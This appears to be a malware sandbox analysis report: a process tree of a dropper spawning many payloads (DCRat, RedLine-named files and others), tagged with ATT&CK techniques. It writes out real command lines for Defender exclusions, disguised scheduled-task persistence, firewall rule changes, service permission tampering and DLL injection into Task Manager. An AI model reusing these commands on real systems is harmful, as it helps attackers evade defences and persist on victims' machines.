Key created	\REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000_Classes\Local Settings	ContainerserverFontSavessession.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

1504 PING.EXE
5332 PING.EXE

pid	process
1504	PING.EXE
5332	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ContainerserverFontSavessession.exe

pid	process
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe
2032	ContainerserverFontSavessession.exe

Suspicious behavior: SetClipboardViewer 2 IoCs

Processes:

twztl.exe216382182.exe

pid process

2520 twztl.exe
3240 216382182.exe

pid	process
2520	twztl.exe
3240	216382182.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

FUCKER.exeContainerserverFontSavessession.exedllhost.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1420	FUCKER.exe
Token: SeDebugPrivilege	2032	ContainerserverFontSavessession.exe
Token: SeDebugPrivilege	3680	dllhost.exe
Token: SeDebugPrivilege	5024	powershell.exe

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

FUCKER.exenpp.exeDCRatBuild.exeWScript.execmd.exe1981120061.exeContainerserverFontSavessession.execmd.exetwztl.exe216382182.exee0cbefcb1af40c7d4aff4aca26621a98.exe

description	pid	process	target process
PID 1420 wrote to memory of 1008	1420	FUCKER.exe	npp.exe
PID 1420 wrote to memory of 1008	1420	FUCKER.exe	npp.exe
PID 1420 wrote to memory of 1008	1420	FUCKER.exe	npp.exe
PID 1008 wrote to memory of 2564	1008	npp.exe	1981120061.exe
PID 1008 wrote to memory of 2564	1008	npp.exe	1981120061.exe
PID 1008 wrote to memory of 2564	1008	npp.exe	1981120061.exe
PID 1420 wrote to memory of 2736	1420	FUCKER.exe	AppGate2103v01.exe
PID 1420 wrote to memory of 2736	1420	FUCKER.exe	AppGate2103v01.exe
PID 1420 wrote to memory of 3504	1420	FUCKER.exe	DCRatBuild.exe
PID 1420 wrote to memory of 3504	1420	FUCKER.exe	DCRatBuild.exe
PID 1420 wrote to memory of 3504	1420	FUCKER.exe	DCRatBuild.exe
PID 1420 wrote to memory of 2520	1420	FUCKER.exe	twztl.exe
PID 1420 wrote to memory of 2520	1420	FUCKER.exe	twztl.exe
PID 1420 wrote to memory of 2520	1420	FUCKER.exe	twztl.exe
PID 3504 wrote to memory of 1960	3504	DCRatBuild.exe	WScript.exe
PID 3504 wrote to memory of 1960	3504	DCRatBuild.exe	WScript.exe
PID 3504 wrote to memory of 1960	3504	DCRatBuild.exe	WScript.exe
PID 1420 wrote to memory of 4780	1420	FUCKER.exe	LoaderAVX.exe
PID 1420 wrote to memory of 4780	1420	FUCKER.exe	LoaderAVX.exe
PID 1960 wrote to memory of 3684	1960	WScript.exe	cmd.exe
PID 1960 wrote to memory of 3684	1960	WScript.exe	cmd.exe
PID 1960 wrote to memory of 3684	1960	WScript.exe	cmd.exe
PID 3684 wrote to memory of 2032	3684	cmd.exe	ContainerserverFontSavessession.exe
PID 3684 wrote to memory of 2032	3684	cmd.exe	ContainerserverFontSavessession.exe
PID 2564 wrote to memory of 3240	2564	1981120061.exe	216382182.exe
PID 2564 wrote to memory of 3240	2564	1981120061.exe	216382182.exe
PID 2564 wrote to memory of 3240	2564	1981120061.exe	216382182.exe
PID 2032 wrote to memory of 2100	2032	ContainerserverFontSavessession.exe	cmd.exe
PID 2032 wrote to memory of 2100	2032	ContainerserverFontSavessession.exe	cmd.exe
PID 2100 wrote to memory of 1860	2100	cmd.exe	chcp.com
PID 2100 wrote to memory of 1860	2100	cmd.exe	chcp.com
PID 2100 wrote to memory of 1504	2100	cmd.exe	PING.EXE
PID 2100 wrote to memory of 1504	2100	cmd.exe	PING.EXE
PID 2520 wrote to memory of 4756	2520	twztl.exe	2657517237.exe
PID 2520 wrote to memory of 4756	2520	twztl.exe	2657517237.exe
PID 2520 wrote to memory of 4756	2520	twztl.exe	2657517237.exe
PID 2564 wrote to memory of 4180	2564	1981120061.exe	2565728307.exe
PID 2564 wrote to memory of 4180	2564	1981120061.exe	2565728307.exe
PID 2564 wrote to memory of 4180	2564	1981120061.exe	2565728307.exe
PID 2100 wrote to memory of 3680	2100	cmd.exe	dllhost.exe
PID 2100 wrote to memory of 3680	2100	cmd.exe	dllhost.exe
PID 1420 wrote to memory of 448	1420	FUCKER.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 1420 wrote to memory of 448	1420	FUCKER.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 1420 wrote to memory of 448	1420	FUCKER.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2520 wrote to memory of 580	2520	twztl.exe	29087837.exe
PID 2520 wrote to memory of 580	2520	twztl.exe	29087837.exe
PID 2520 wrote to memory of 580	2520	twztl.exe	29087837.exe
PID 3240 wrote to memory of 3000	3240	216382182.exe	328410286.exe
PID 3240 wrote to memory of 3000	3240	216382182.exe	328410286.exe
PID 3240 wrote to memory of 3000	3240	216382182.exe	328410286.exe
PID 448 wrote to memory of 5024	448	e0cbefcb1af40c7d4aff4aca26621a98.exe	powershell.exe
PID 448 wrote to memory of 5024	448	e0cbefcb1af40c7d4aff4aca26621a98.exe	powershell.exe
PID 448 wrote to memory of 5024	448	e0cbefcb1af40c7d4aff4aca26621a98.exe	powershell.exe
PID 2564 wrote to memory of 3176	2564	1981120061.exe	393631562.exe
PID 2564 wrote to memory of 3176	2564	1981120061.exe	393631562.exe
PID 2564 wrote to memory of 3176	2564	1981120061.exe	393631562.exe
PID 3240 wrote to memory of 4784	3240	216382182.exe	180932213.exe
PID 3240 wrote to memory of 4784	3240	216382182.exe	180932213.exe
PID 3240 wrote to memory of 4784	3240	216382182.exe	180932213.exe
PID 2520 wrote to memory of 740	2520	twztl.exe	56319815.exe
PID 2520 wrote to memory of 740	2520	twztl.exe	56319815.exe
PID 2520 wrote to memory of 740	2520	twztl.exe	56319815.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

8592 attrib.exe

pid	process
8592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420

C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1008

C:\Users\Admin\AppData\Local\Temp\1981120061.exe
C:\Users\Admin\AppData\Local\Temp\1981120061.exe
3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2564

C:\Users\Admin\AppData\Local\Temp\216382182.exe
C:\Users\Admin\AppData\Local\Temp\216382182.exe
4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: SetClipboardViewer
- Suspicious use of WriteProcessMemory
PID:3240

C:\Users\Admin\AppData\Local\Temp\328410286.exe
C:\Users\Admin\AppData\Local\Temp\328410286.exe
5⤵
- Executes dropped EXE
PID:3000

C:\Users\Admin\AppData\Local\Temp\180932213.exe
C:\Users\Admin\AppData\Local\Temp\180932213.exe
5⤵
- Executes dropped EXE
PID:4784

C:\Users\Admin\AppData\Local\Temp\233683733.exe
C:\Users\Admin\AppData\Local\Temp\233683733.exe
5⤵
PID:3940

C:\Users\Admin\AppData\Local\Temp\808628787.exe
C:\Users\Admin\AppData\Local\Temp\808628787.exe
5⤵
PID:340

C:\Users\Admin\AppData\Local\Temp\2565728307.exe
C:\Users\Admin\AppData\Local\Temp\2565728307.exe
4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:4180

C:\Users\Admin\AppData\Local\Temp\393631562.exe
C:\Users\Admin\AppData\Local\Temp\393631562.exe
4⤵
- Executes dropped EXE
PID:3176

C:\Users\Admin\AppData\Local\Temp\274826858.exe
C:\Users\Admin\AppData\Local\Temp\274826858.exe
4⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c shutdown /r
5⤵
PID:6568

C:\Windows\SysWOW64\shutdown.exe
shutdown /r
6⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\Files\AppGate2103v01.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AppGate2103v01.exe"
2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2736

C:\Users\Admin\Documents\SimpleAdobe\M42HgmNGqLaS_ZW4AAaOk7P0.exe
C:\Users\Admin\Documents\SimpleAdobe\M42HgmNGqLaS_ZW4AAaOk7P0.exe
3⤵
PID:7108

C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe"
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\PortproviderwinMonitorSvc\mfKYow52WThs6WxYPgYy8SvlAX398RVKTuVkRNatbU.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\PortproviderwinMonitorSvc\vcwCtM23VtO7vZcBlCg44jyJmSVgI43HgFP0J6KvnQO3IbLY.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3684

C:\PortproviderwinMonitorSvc\ContainerserverFontSavessession.exe
"C:\PortproviderwinMonitorSvc/ContainerserverFontSavessession.exe"
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6nny8f82C5.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:2100

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:1860

C:\Windows\system32\PING.EXE
ping -n 10 localhost
7⤵
- Runs ping.exe
PID:1504

C:\odt\dllhost.exe
"C:\odt\dllhost.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3680

C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
2⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: SetClipboardViewer
- Suspicious use of WriteProcessMemory
PID:2520

C:\Users\Admin\AppData\Local\Temp\2657517237.exe
C:\Users\Admin\AppData\Local\Temp\2657517237.exe
3⤵
- Executes dropped EXE
PID:4756

C:\Users\Admin\AppData\Local\Temp\29087837.exe
C:\Users\Admin\AppData\Local\Temp\29087837.exe
3⤵
- Executes dropped EXE
PID:580

C:\Users\Admin\AppData\Local\Temp\56319815.exe
C:\Users\Admin\AppData\Local\Temp\56319815.exe
3⤵
- Executes dropped EXE
PID:740

C:\Users\Admin\AppData\Local\Temp\312522153.exe
C:\Users\Admin\AppData\Local\Temp\312522153.exe
3⤵
PID:1124

C:\Users\Admin\AppData\Local\Temp\1369712451.exe
C:\Users\Admin\AppData\Local\Temp\1369712451.exe
3⤵
PID:7588

C:\Users\Admin\AppData\Local\Temp\1858214756.exe
C:\Users\Admin\AppData\Local\Temp\1858214756.exe
4⤵
PID:5520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
5⤵
PID:7628

C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe"
2⤵
- Executes dropped EXE
PID:4780

C:\Users\Admin\AppData\Local\Temp\Files\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\Files\e0cbefcb1af40c7d4aff4aca26621a98.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5024

C:\Users\Admin\AppData\Local\Temp\Files\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\Files\e0cbefcb1af40c7d4aff4aca26621a98.exe"
3⤵
PID:2804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:1292

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2808

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:1716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:5492

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
PID:3132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4028

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4812

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:6368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:6620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:7096

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:864

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:6212

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:7396

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:5628

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
5⤵
PID:3144

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:6148

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
- Launches sc.exe
PID:5992

C:\Users\Admin\AppData\Local\Temp\Files\medcallaboratory5.exe
"C:\Users\Admin\AppData\Local\Temp\Files\medcallaboratory5.exe"
2⤵
PID:4776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\medcallaboratory5.exe"
3⤵
PID:4972

C:\Users\Admin\AppData\Local\Temp\Files\alex12341.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex12341.exe"
2⤵
PID:2348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2796

C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"
4⤵
PID:2324

C:\Users\Admin\AppData\Roaming\configurationValue\TWO.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\TWO.exe"
4⤵
PID:3584

C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe"
2⤵
PID:4508

C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe"
2⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\Files\Vbnhtlkdfw.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Vbnhtlkdfw.exe"
2⤵
PID:3432

C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe
"C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"
2⤵
PID:3268

C:\Users\Admin\AppData\Local\Temp\Files\Nzewxakqtk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Nzewxakqtk.exe"
2⤵
PID:2284

C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
2⤵
PID:4796

C:\Windows\System32\werfault.exe
\??\C:\Windows\System32\werfault.exe
3⤵
PID:2560

C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe
"C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe"
2⤵
PID:3352

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
2⤵
PID:5748

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
2⤵
PID:5860

C:\Users\Admin\AppData\Local\Temp\Files\Document.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Document.exe"
2⤵
PID:5984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\Document.exe"
3⤵
PID:6096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
3⤵
PID:6072

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4E74.tmp"
3⤵
- Creates scheduled task(s)
PID:1860

C:\Users\Admin\AppData\Local\Temp\Files\Document.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Document.exe"
3⤵
PID:5572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
4⤵
PID:32

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
5⤵
- Creates scheduled task(s)
PID:6016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8A64.tmp.bat""
4⤵
PID:3424

C:\Windows\SysWOW64\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:2032

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
5⤵
PID:6016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:2532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
6⤵
PID:3580

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3605.tmp"
6⤵
- Creates scheduled task(s)
PID:2256

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\Files\s1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\s1.exe"
2⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\Files\dsdasda.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dsdasda.exe"
2⤵
PID:896

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 796
4⤵
- Program crash
PID:3060

C:\Users\Admin\AppData\Local\Temp\Files\Tinder%20Bot.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Tinder%20Bot.exe"
2⤵
PID:4840

C:\Users\Admin\AppData\Local\Temp\Files\kb^fr_ouverture.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kb^fr_ouverture.exe"
2⤵
PID:5792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 716
3⤵
- Program crash
PID:4720

C:\Users\Admin\AppData\Local\Temp\Files\redlinepanel.exe
"C:\Users\Admin\AppData\Local\Temp\Files\redlinepanel.exe"
2⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe
"C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe"
2⤵
PID:5128

C:\Users\Admin\AppData\Local\directory\word.exe
"C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe"
3⤵
PID:3860

C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe"
4⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\Files\install.exe
"C:\Users\Admin\AppData\Local\Temp\Files\install.exe"
2⤵
PID:5788

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\Files\Tdkdsxz.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Tdkdsxz.exe"
2⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe
"C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe"
2⤵
PID:3008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nologo -noprofile -noninteractive -executionpolicy bypass -command .\serverBrowser.ps1
3⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
2⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Launcher.exe"
2⤵
PID:5960

C:\Users\Admin\AppData\Local\Temp\Files\martinvnc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\martinvnc.exe"
2⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k
3⤵
PID:5348

C:\Users\Admin\AppData\Local\Temp\Files\mk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\mk.exe"
2⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
2⤵
PID:1960

C:\Users\Admin\AppData\Local\Temp\Files\23.exe
"C:\Users\Admin\AppData\Local\Temp\Files\23.exe"
2⤵
PID:2056

C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
3⤵
PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 1248
3⤵
- Program crash
PID:5456

C:\Users\Admin\AppData\Local\Temp\Files\mysto.exe
"C:\Users\Admin\AppData\Local\Temp\Files\mysto.exe"
2⤵
PID:5176

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"
3⤵
PID:2260

C:\Users\Admin\AppData\Local\Temp\RarSFX0\SearchUI.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\SearchUI.exe"
4⤵
PID:2160

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
